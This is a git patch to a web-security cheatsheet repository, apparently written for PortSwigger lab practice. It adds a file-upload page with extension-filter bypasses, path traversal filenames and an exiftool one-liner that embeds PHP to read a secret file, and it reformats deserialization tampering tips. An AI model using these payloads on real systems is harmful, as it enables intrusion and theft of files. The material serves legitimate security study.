From c2ccb4ef3f3d778946b7cbbd64c2fb2afcc316a3 Mon Sep 17 00:00:00 2001
From: xanhacks <xanhacks@protonmail.com>
Date: Tue, 13 Dec 2022 14:25:47 +0100
Subject: [PATCH] add file upload

---
 docs/web/deserialization.md |  5 ++---
 docs/web/file-upload.md     | 20 ++++++++++++++++++++
 2 files changed, 22 insertions(+), 3 deletions(-)
 create mode 100644 docs/web/file-upload.md

diff --git a/docs/web/deserialization.md b/docs/web/deserialization.md
index 7e31a45..0ce54ff 100644
--- a/docs/web/deserialization.md
+++ b/docs/web/deserialization.md
@@ -11,9 +11,8 @@ description: Insecure deserialization cheatsheet
 
 ## Cheatsheet
 
-Java serialize : `0xACED` or `rO0` (base64)
-Ruby serialize : `\x04\bo:\vUser`
-
+- Java serialize : `0xACED` or `rO0` (base64)
+- Ruby serialize : `\x04\bo:\vUser`
 - Modify PHP attribute `O:4:"User":2:{s:8:"username";s:6:"carlos";s:7:"isAdmin";b:0;}` to `b:1`
 - Change data type for low comparaison bypass `0 == "Example string" // true`
 - Replace `avatar` path in your cookie and delete your account, the file will be delete
diff --git a/docs/web/file-upload.md b/docs/web/file-upload.md
new file mode 100644
index 0000000..11be87e
--- /dev/null
+++ b/docs/web/file-upload.md
@@ -0,0 +1,20 @@
+# Insecure File upload
+
+## Definition
+
+**Insecure file upload** refers to a vulnerability in a computer system that allows unauthorized users to upload files to the system. This can be a serious security risk because it can allow attackers to upload malicious files, such as viruses or malware, that can compromise the security of the system. To prevent insecure file uploads, it is important to implement appropriate security measures, such as file type restrictions and authentication checks, to ensure that only authorized users are able to upload files.
+
+## Cheathsheet
+
+- Upload basic php file
+- Change PHP content type to `Content-Type: image/jpeg`
+- Path traversal in filename `../read_carlos_secret.php` or `..%2Fread_carlos_secret.php`
+- Bypass PHP file extension filter `php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, ...`
+- Other bypass `.pHp, .png.php`, `.php%00.png`, ...
+- Add PHP in image metadata : `exiftool -Comment='<?php echo "AAAA-"; echo file_get_contents("/home/carlos/secret"); echo "-BBBB"; ?>' toto.png.php`
+- Uploading files using PUT
+- Polyglot file [PHAR/JPEG generator](https://gitlab.com/xanhacks/phar-jpg-polyglot/)
+
+## References
+
+- [PortSwigger - File upload](https://portswigger.net/web-security/file-upload)
\ No newline at end of file